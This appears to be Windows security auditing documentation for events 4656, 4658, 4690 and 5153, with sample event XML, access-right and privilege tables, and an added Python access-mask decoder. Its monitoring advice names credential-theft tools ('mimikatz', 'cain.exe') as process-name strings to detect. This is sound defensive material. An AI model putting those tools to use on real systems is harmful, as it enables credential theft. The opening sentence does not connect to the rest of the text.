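The finding codes are deliberately one per recommendation so that a SIEM rule can key on them; the same function can be run over exported Security log XML once the records are split into individual Event elements.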
5153(S): A more restrictive Windows Filtering Platform filter has blocked a packet.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
This event is logged if a more restrictive Windows Filtering Platform filter has blocked a packet.
There is no example of this event in this document.
Subcategory: Audit Filtering Platform Packet Drop
Event Schema:
A more restrictive Windows Filtering Platform filter has blocked a packet.
Application Information:

Process ID:%1
Application Name:%2

Network Information:

Source Address:%3
Source Port:%4
Protocol:%5

Filter Information:

Filter Run-Time ID:%6


Layer Name:%7
Layer Run-Time ID:%8

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
Audit Handle Manipulation

Applies to
Windows 10
Windows Server 2016
Audit Handle Manipulation enables generation of “4658: The handle to an object was closed” in Audit File
System, Audit Kernel Object, Audit Registry, Audit Removable Storage and Audit SAM subcategories, and shows
object’s handle duplication and close actions.
Event volume: High.

COMPUTER TYPE      GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller  No                No                No                 No
Member Server      No                No                No                 No
Workstation        No                No                No                 No

Comments (all computer types): Typically, information about the duplication or closing of an object handle has little to no security relevance and is hard to parse or analyze. There is no recommendation to enable this subcategory for Success or Failure auditing, unless you know exactly what you need to monitor at the Object’s Handles level.

Events List:
4658(S): The handle to an object was closed.
4690(S): An attempt was made to duplicate a handle to an object.

4658(S): The handle to an object was closed.


This event doesn’t generate in this subcategory, but you can use this subcategory to enable it. For a description
of the event, see “4658(S): The handle to an object was closed” in the Audit File System subcategory.
4690(S): An attempt was made to duplicate a handle to an object.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Handle Manipulation
Event Description:
This event generates if an attempt was made to duplicate a handle to an object.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4690</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12807</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-23T00:17:41.755998800Z" />
<EventRecordID>338632</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="1100" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-18</Data>
<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="SourceHandleId">0x438</Data>
<Data Name="SourceProcessId">0x674</Data>
<Data Name="TargetHandleId">0xd9c</Data>
<Data Name="TargetProcessId">0x4</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that made an attempt to duplicate a handle to an object. Event Viewer
automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the
source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that made an attempt to duplicate a
handle to an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Source Handle Information:
Source Handle ID [Type = Pointer]: hexadecimal value of a handle which was duplicated. This field can
help you correlate this event with other events, for example “4663: An attempt was made to access an
object” in Audit File System, Audit Kernel Object, Audit Registry, Audit Removable Storage or Audit SAM
subcategories.
Source Process ID [Type = Pointer]: hexadecimal Process ID of the process which opened the Source
Handle ID before it was duplicated. Process ID (PID) is a number used by the operating system to uniquely
identify an active process. To see the PID for a specific process you can, for example, use Task Manager
(Details tab, PID column).

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
New Handle Information:
Target Handle ID [Type = Pointer]: hexadecimal value of the new handle (the copy of Source Handle ID ).
This field can help you correlate this event with other events, for example “4663: An attempt was made to
access an object” in Audit File System, Audit Kernel Object, Audit Registry, Audit Removable Storage or
Audit SAM subcategories.
Target Process ID [Type = Pointer]: hexadecimal Process ID of the process which opened the Target
Handle ID. Process ID (PID) is a number used by the operating system to uniquely identify an active
process. You can also correlate this process ID with a process ID in other events, for example, “4688: A new
process has been created” Process Information\New Process ID field.
Security Monitoring Recommendations
For 4690(S): An attempt was made to duplicate a handle to an object.
Typically this event has little to no security relevance and is hard to parse or analyze. There is no
recommendation for this event, unless you know exactly what you need to monitor with it.
This event can be used to track all actions or operations related to a specific object handle.
Audit Kernel Object

Applies to
Windows 10
Windows Server 2016
Audit Kernel Object determines whether the operating system generates audit events when users attempt to
access the system kernel, which includes mutexes and semaphores.
Only kernel objects with a matching system access control list (SACL ) generate security audit events. The audits
generated are usually useful only to developers.
Typically, kernel objects are given SACLs only if the AuditBaseObjects or AuditBaseDirectories auditing options
are enabled.
The “Audit: Audit the access of global system objects” policy setting controls the default SACL of kernel objects.
Event volume: High.

COMPUTER TYPE      GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller  No                No                No                 No
Member Server      No                No                No                 No
Workstation        No                No                No                 No

Comments (all computer types): Typically Kernel object auditing events have little to no security relevance and are hard to parse or analyze. Also, the volume of these events is typically very high. There is no recommendation to enable this subcategory, unless you know exactly what you need to monitor at the Kernel objects level.

Events List:
4656(S, F): A handle to an object was requested.
4658(S): The handle to an object was closed.
4660(S): An object was deleted.
4663(S): An attempt was made to access an object.
4656(S, F): A handle to an object was requested.

Applies to
Windows 10
Windows Server 2016

Subcategories: Audit File System, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event indicates that specific access was requested for an object. The object could be a file system, kernel, or
registry object, or a file system object on removable storage or a device.
If access was declined, a Failure event is generated.
This event generates only if the object’s SACL has the required ACE to handle the use of specific access rights.
This event shows that access was requested, and the results of the request, but it doesn’t show that the operation
was performed. To see that the operation was performed, check “4663(S): An attempt was made to access an
object.”

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4656</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12800</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T22:15:19.346776600Z" />
<EventRecordID>274057</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x4367b</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\Documents\HBI Data.txt</Data>
<Data Name="HandleId">0x0</Data>
<Data Name="TransactionId">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data>
<Data Name="AccessReason">%%1538: %%1804 %%1541: %%1809 %%4416: %%1809 %%4417: %%1809 %%4418: %%1802 D:
(D;;LC;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4419: %%1809 %%4420: %%1809 %%4423: %%1811 D:
(A;OICI;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104) %%4424: %%1809</Data>
<Data Name="AccessMask">0x12019f</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="RestrictedSidCount">0</Data>
<Data Name="ProcessId">0x1074</Data>
<Data Name="ProcessName">C:\Windows\System32\notepad.exe</Data>
<Data Name="ResourceAttributes">S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions:
0 - Windows Server 2008, Windows Vista.
1 - Windows Server 2012, Windows 8.
Added “Resource Attributes” field.
Added “Access Reasons” field.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested a handle to an object. Event Viewer automatically tries
to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the
event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique
identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested a handle to an object.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following table contains the list of the most common Object Types:

Directory                 Event            Timer                  Device
Mutant                    Type             File                   Token
Thread                    Section          WindowStation          DebugObject
FilterCommunicationPort   EventPair        Driver                 IoCompletion
Controller                SymbolicLink     WmiGuid                Process
Profile                   Desktop          KeyedEvent             Adapter
Key                       WaitablePort     Callback               Semaphore
Job                       Port             FilterConnectionPort   ALPC Port


Object Name [Type = UnicodeString]: name and other identifying information for the object for which
access was requested. For example, for a file, the path would be included.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you
correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An
attempt was made to access an object.” This parameter might not be captured in the event, and in that case
appears as “0x0”.
Resource Attributes [Type = UnicodeString] [Version 1]: attributes associated with the object. For some
objects, the field does not apply and “-“ is displayed.
For example, for a file, the following might be displayed: S:AI(RA;ID;;;;WD;("Impact_MS",TI,0x10020,3000))
Impact_MS: Resource Property ID.
3000: Resource Property Value.

Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the access was
requested. Process ID (PID) is a number used by the operating system to uniquely identify an active process.
To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Access Request Information:
Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event
with other events that might contain the same Transaction ID, such as “4660(S): An object was deleted.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-
0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID. These
access rights depend on Object Type. The following table contains information about the most common access
rights for file system objects. Access rights for registry objects are often similar to file system objects, but the
table contains a few notes about how they vary.

Each entry below gives the ACCESS name, its HEXADECIMAL VALUE and SCHEMA VALUE, and a DESCRIPTION.

ReadData (or ListDirectory): 0x1, %%4416
(For registry objects, this is “Query key value.”)
ReadData - For a file object, the right to read the corresponding file data. For a directory object, the right to read the corresponding directory data.
ListDirectory - For a directory, the right to list the contents of the directory.

WriteData (or AddFile): 0x2, %%4417
(For registry objects, this is “Set key value.”)
WriteData - For a file object, the right to write data to the file. For a directory object, the right to create a file in the directory (FILE_ADD_FILE).
AddFile - For a directory, the right to create a file in the directory.

AppendData (or AddSubdirectory or CreatePipeInstance): 0x4, %%4418
AppendData - For a file object, the right to append data to the file. (For local files, write operations will not overwrite existing data if this flag is specified without FILE_WRITE_DATA.) For a directory object, the right to create a subdirectory (FILE_ADD_SUBDIRECTORY).
AddSubdirectory - For a directory, the right to create a subdirectory.
CreatePipeInstance - For a named pipe, the right to create a pipe.

ReadEA: 0x8, %%4419
(For registry objects, this is “Enumerate sub-keys.”)
The right to read extended file attributes.

WriteEA: 0x10, %%4420
The right to write extended file attributes.

Execute/Traverse: 0x20, %%4421
Execute - For a native code file, the right to execute the file. This access right given to scripts may cause the script to be executable, depending on the script interpreter.
Traverse - For a directory, the right to traverse the directory. By default, users are assigned the BYPASS_TRAVERSE_CHECKING privilege, which ignores the FILE_TRAVERSE access right. See the remarks in File Security and Access Rights for more information.

DeleteChild: 0x40, %%4422
For a directory, the right to delete a directory and all the files it contains, including read-only files.

ReadAttributes: 0x80, %%4423
The right to read file attributes.

WriteAttributes: 0x100, %%4424
The right to write file attributes.

DELETE: 0x10000, %%1537
The right to delete the object.

READ_CONTROL: 0x20000, %%1538
The right to read the information in the object's security descriptor, not including the information in the system access control list (SACL).

WRITE_DAC: 0x40000, %%1539
The right to modify the discretionary access control list (DACL) in the object's security descriptor.

WRITE_OWNER: 0x80000, %%1540
The right to change the owner in the object's security descriptor.

SYNCHRONIZE: 0x100000, %%1541
The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state. Some object types do not support this access right.

ACCESS_SYS_SEC: 0x1000000, %%1542
The ACCESS_SYS_SEC access right controls the ability to get or set the SACL in an object's security descriptor.

Table 14. File System objects access rights.

Access Reasons [Type = UnicodeString] [Version 1]: the list of access check results. The format of this
varies, depending on the object. For kernel objects, this field does not apply.
Access Mask [Type = HexInt32]: hexadecimal mask for the requested or performed operation. For more
information, see the preceding table.
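The decoding described by Table 14 and the Access Mask field, as an added Python example (not the page's or Microsoft's own code): it maps an Access Mask and the %%-schema tokens of the Accesses field to the names in Table 14, cross-checks that the two fields agree, and reports which requested rights modify the object and whether any privilege was used for the access check. The record it parses is reduced from the 4656 sample shown above; the MODIFYING_RIGHTS grouping is my own triage choice, not a classification the page makes.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Table 14 from the page: (bit value, schema value, access name) for file system objects.
FILE_ACCESS_RIGHTS = [
    (0x1, "%%4416", "ReadData"),
    (0x2, "%%4417", "WriteData"),
    (0x4, "%%4418", "AppendData"),
    (0x8, "%%4419", "ReadEA"),
    (0x10, "%%4420", "WriteEA"),
    (0x20, "%%4421", "Execute/Traverse"),
    (0x40, "%%4422", "DeleteChild"),
    (0x80, "%%4423", "ReadAttributes"),
    (0x100, "%%4424", "WriteAttributes"),
    (0x10000, "%%1537", "DELETE"),
    (0x20000, "%%1538", "READ_CONTROL"),
    (0x40000, "%%1539", "WRITE_DAC"),
    (0x80000, "%%1540", "WRITE_OWNER"),
    (0x100000, "%%1541", "SYNCHRONIZE"),
    (0x1000000, "%%1542", "ACCESS_SYS_SEC"),
]
SCHEMA_TO_NAME = {schema: name for _, schema, name in FILE_ACCESS_RIGHTS}
KNOWN_BITS = sum(bit for bit, _, _ in FILE_ACCESS_RIGHTS)

# Rights that alter the object or its security descriptor. This grouping is my own
# triage choice for review, not a classification the page makes.
MODIFYING_RIGHTS = {"WriteData", "AppendData", "WriteEA", "DeleteChild", "WriteAttributes",
                    "DELETE", "WRITE_DAC", "WRITE_OWNER", "ACCESS_SYS_SEC"}


def decode_access_mask(mask):
    """Split a hexadecimal Access Mask (string or int) into the named rights it contains.
    Returns (names in bit order, leftover bits that Table 14 does not cover)."""
    value = int(mask, 16) if isinstance(mask, str) else mask
    names = [name for bit, _, name in FILE_ACCESS_RIGHTS if value & bit]
    return names, value & ~KNOWN_BITS


def decode_access_list(access_list):
    """Translate the %%-schema tokens of the Accesses field into names; unknown tokens pass through."""
    return [SCHEMA_TO_NAME.get(token, token) for token in access_list.split()]


def summarize_4656(xml_text):
    """Parse one 4656 record and decode what was requested, on which object, and with which privileges."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    mask_names, leftover = decode_access_mask(fields["AccessMask"])
    list_names = decode_access_list(fields.get("AccessList", ""))
    privileges = fields.get("PrivilegeList", "-")
    return {
        "object": fields.get("ObjectName", ""),
        "process": fields.get("ProcessName", ""),
        "rights": mask_names,
        "unmapped_bits": leftover,
        # The Accesses list and the Access Mask describe the same request; a mismatch
        # would mean the schema table used here is incomplete for this object type.
        "list_matches_mask": set(list_names) == set(mask_names),
        "modifying": sorted(MODIFYING_RIGHTS.intersection(mask_names)),
        "privileges_used": [] if privileges == "-" else privileges.split(),
    }


# EventData reduced from the 4656 sample on the page (System element trimmed to the EventID).
SAMPLE_4656 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4656</EventID></System>
<EventData>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\\Documents\\HBI Data.txt</Data>
<Data Name="AccessList">%%1538 %%1541 %%4416 %%4417 %%4418 %%4419 %%4420 %%4423 %%4424</Data>
<Data Name="AccessMask">0x12019f</Data>
<Data Name="PrivilegeList">-</Data>
<Data Name="ProcessName">C:\\Windows\\System32\\notepad.exe</Data>
</EventData></Event>"""

if __name__ == "__main__":
    for key, value in summarize_4656(SAMPLE_4656).items():
        print("%-18s %s" % (key, value))
```

For the sample record the mask 0x12019f decodes to ReadData, WriteData, AppendData, ReadEA, WriteEA, ReadAttributes, WriteAttributes, READ_CONTROL and SYNCHRONIZE, which is exactly the nine schema tokens in the Accesses field; a non-zero unmapped_bits value on a registry or kernel object is the signal to consult that object type's own rights table instead of Table 14.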
Privileges Used for Access Check [Type = UnicodeString]: the list of user privileges which were used during
the operation, for example, SeBackupPrivilege. This parameter might not be captured in the event, and in that
case appears as “-”. See full list of user privileges in the table below:

PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeAssignPrimaryTokenPrivilege Replace a process-level token Required to assign the primary token of


a process.
With this privilege, the user can initiate
a process to replace the default token
associated with a started subprocess.

SeAuditPrivilege Generate security audits With this privilege, the user can add
entries to the security log.

SeBackupPrivilege Back up files and directories - Required to perform backup


operations.
With this privilege, the user can bypass
file and directory, registry, and other
persistent object permissions for the
purposes of backing up the system.
This privilege causes the system to
grant all read access control to any file,
regardless of the access control list
(ACL) specified for the file. Any access
request other than read is still evaluated
with the ACL. The following access
rights are granted if this privilege is
held:
READ_CONTROL
ACCESS_SYSTEM_SECURITY
FILE_GENERIC_READ
FILE_TRAVERSE
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeChangeNotifyPrivilege Bypass traverse checking Required to receive notifications of


changes to files or directories. This
privilege also causes the system to skip
all traversal access checks.
With this privilege, the user can traverse
directory trees even though the user
may not have permissions on the
traversed directory. This privilege does
not allow the user to list the contents of
a directory, only to traverse directories.

SeCreateGlobalPrivilege Create global objects Required to create named file mapping


objects in the global namespace during
Terminal Services sessions.

SeCreatePagefilePrivilege Create a pagefile With this privilege, the user can create
and change the size of a pagefile.

SeCreatePermanentPrivilege Create permanent shared objects Required to create a permanent object.


This privilege is useful to kernel-mode
components that extend the object
namespace. Components that are
running in kernel mode already have
this privilege inherently; it is not
necessary to assign them the privilege.

SeCreateSymbolicLinkPrivilege Create symbolic links Required to create a symbolic link.

SeCreateTokenPrivilege Create a token object Allows a process to create a token which


it can then use to get access to any local
resources when the process uses
NtCreateToken() or other token-creation
APIs.
When a process requires this privilege,
we recommend using the LocalSystem
account (which already includes the
privilege), rather than creating a
separate user account and assigning
this privilege to it.

SeDebugPrivilege Debug programs Required to debug and adjust the


memory of a process owned by another
account.
With this privilege, the user can attach a
debugger to any process or to the
kernel. Developers who are debugging
their own applications do not need this
user right. Developers who are
debugging new system components
need this user right. This user right
provides complete access to sensitive
and critical operating system
components.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeEnableDelegationPrivilege Enable computer and user accounts to Required to mark user and computer
be trusted for delegation accounts as trusted for delegation.
With this privilege, the user can set the
Trusted for Delegation setting on a
user or computer object.
The user or object that is granted this
privilege must have write access to the
account control flags on the user or
computer object. A server process
running on a computer (or under a user
context) that is trusted for delegation
can access resources on another
computer using the delegated
credentials of a client, as long as the
account of the client does not have the
Account cannot be delegated
account control flag set.

SeImpersonatePrivilege Impersonate a client after With this privilege, the user can
authentication impersonate other accounts.

SeIncreaseBasePriorityPrivilege Increase scheduling priority Required to increase the base priority of


a process.
With this privilege, the user can use a
process with Write property access to
another process to increase the
execution priority assigned to the other
process. A user with this privilege can
change the scheduling priority of a
process through the Task Manager user
interface.

SeIncreaseQuotaPrivilege Adjust memory quotas for a process Required to increase the quota assigned
to a process.
With this privilege, the user can change
the maximum memory that can be
consumed by a process.

SeIncreaseWorkingSetPrivilege Increase a process working set Required to allocate more memory for
applications that run in the context of
users.

SeLoadDriverPrivilege Load and unload device drivers Required to load or unload a device
driver.
With this privilege, the user can
dynamically load and unload device
drivers or other code in to kernel mode.
This user right does not apply to Plug
and Play device drivers.
PRIVILEGE NAME USER RIGHT GROUP POLICY NAME DESCRIPTION

SeLockMemoryPrivilege Lock pages in memory Required to lock physical pages in


memory.
With this privilege, the user can use a
process to keep data in physical
memory, which prevents the system
from paging the data to virtual memory
on disk. Exercising this privilege could
significantly affect system performance
by decreasing the amount of available
random access memory (RAM).

SeMachineAccountPrivilege | Add workstations to domain | With this privilege, the user can create a computer account. This privilege is valid only on domain controllers.

SeManageVolumePrivilege | Perform volume maintenance tasks | Required to run maintenance tasks on a volume, such as remote defragmentation.

SeProfileSingleProcessPrivilege | Profile single process | Required to gather profiling information for a single process. With this privilege, the user can use performance monitoring tools to monitor the performance of non-system processes.

SeRelabelPrivilege | Modify an object label | Required to modify the mandatory integrity level of an object.

SeRemoteShutdownPrivilege | Force shutdown from a remote system | Required to shut down a system using a network request.

SeRestorePrivilege | Restore files and directories | Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent objects permissions when restoring backed up files and directories and determines which users can set any valid security principal as the owner of an object.

SeSecurityPrivilege | Manage auditing and security log | Required to perform a number of security-related functions, such as controlling and viewing audit events in security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.

SeShutdownPrivilege | Shut down the system | Required to shut down a local system.

SeSyncAgentPrivilege | Synchronize directory service data | This privilege enables the holder to read all objects and properties in the directory, regardless of the protection on the objects and properties. By default, it is assigned to the Administrator and LocalSystem accounts on domain controllers. With this privilege, the user can synchronize all directory service data. This is also known as Active Directory synchronization.

SeSystemEnvironmentPrivilege | Modify firmware environment values | Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.

SeSystemProfilePrivilege | Profile system performance | Required to gather profiling information for the entire system. With this privilege, the user can use performance monitoring tools to monitor the performance of system processes.

SeSystemtimePrivilege | Change the system time | Required to modify the system time. With this privilege, the user can change the time and date on the internal clock of the computer. Users that are assigned this user right can affect the appearance of event logs. If the system time is changed, events that are logged will reflect this new time, not the actual time that the events occurred.

SeTakeOwnershipPrivilege | Take ownership of files or other objects | Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.

SeTcbPrivilege | Act as part of the operating system | This privilege identifies its holder as part of the trusted computer base. This user right allows a process to impersonate any user without authentication. The process can therefore gain access to the same local resources as that user.

SeTimeZonePrivilege | Change the time zone | Required to adjust the time zone associated with the computer's internal clock.

SeTrustedCredManAccessPrivilege | Access Credential Manager as a trusted caller | Required to access Credential Manager as a trusted caller.

SeUndockPrivilege | Remove computer from docking station | Required to undock a laptop. With this privilege, the user can undock a portable computer from its docking station without logging on.

SeUnsolicitedInputPrivilege | Not applicable | Required to read unsolicited input from a terminal device.

Restricted SID Count [Type = UInt32]: Number of restricted SIDs in the token. Applicable to only specific Object Types.

Security Monitoring Recommendations

For 4656(S, F): A handle to an object was requested.
For kernel objects, this event and other auditing events have little to no security relevance and are hard to parse or analyze. There is no recommendation for auditing them, unless you know exactly what you need to monitor at the Kernel objects level.
For other types of objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with “Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or “cain.exe”), check for these substrings in “Process Name.”
If Object Name is a sensitive or critical object for which you need to monitor any access attempt, monitor all 4656 events.
If Object Name is a sensitive or critical object for which you need to monitor specific access attempts (for example, only write actions), monitor for all 4656 events with the corresponding Access Request Information\Accesses values.
If you need to monitor files and folders with specific Resource Attribute values, monitor for all 4656 events with specific Resource Attributes field values.
For file system objects, we recommend that you monitor these Access Request Information\Accesses rights (especially for Failure events):
WriteData (or AddFile)
AppendData (or AddSubdirectory or CreatePipeInstance)
WriteEA
DeleteChild
WriteAttributes
DELETE
WRITE_DAC
WRITE_OWNER

4658(S): The handle to an object was closed.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Handle Manipulation, Audit Kernel Object, Audit Registry, and Audit Removable Storage
Event Description:
This event generates when the handle to an object is closed. The object could be a file system, kernel, or registry object, or a file system object on removable storage or a device.
This event generates only if Success auditing is enabled for Audit Handle Manipulation subcategory.
Typically this event is needed if you need to know how long the handle to the object was open. Otherwise, it might not have any security relevance.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>4658</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12800</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-09-22T00:15:42.910428100Z" />
    <EventRecordID>276724</EventRecordID>
    <Correlation />
    <Execution ProcessID="4" ThreadID="5056" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x4367b</Data>
    <Data Name="ObjectServer">Security</Data>
    <Data Name="HandleId">0x18a8</Data>
    <Data Name="ProcessId">0xef0</Data>
    <Data Name="ProcessName">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>

Required Server Roles: None.
Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “close object’s handle” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “close object’s handle” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
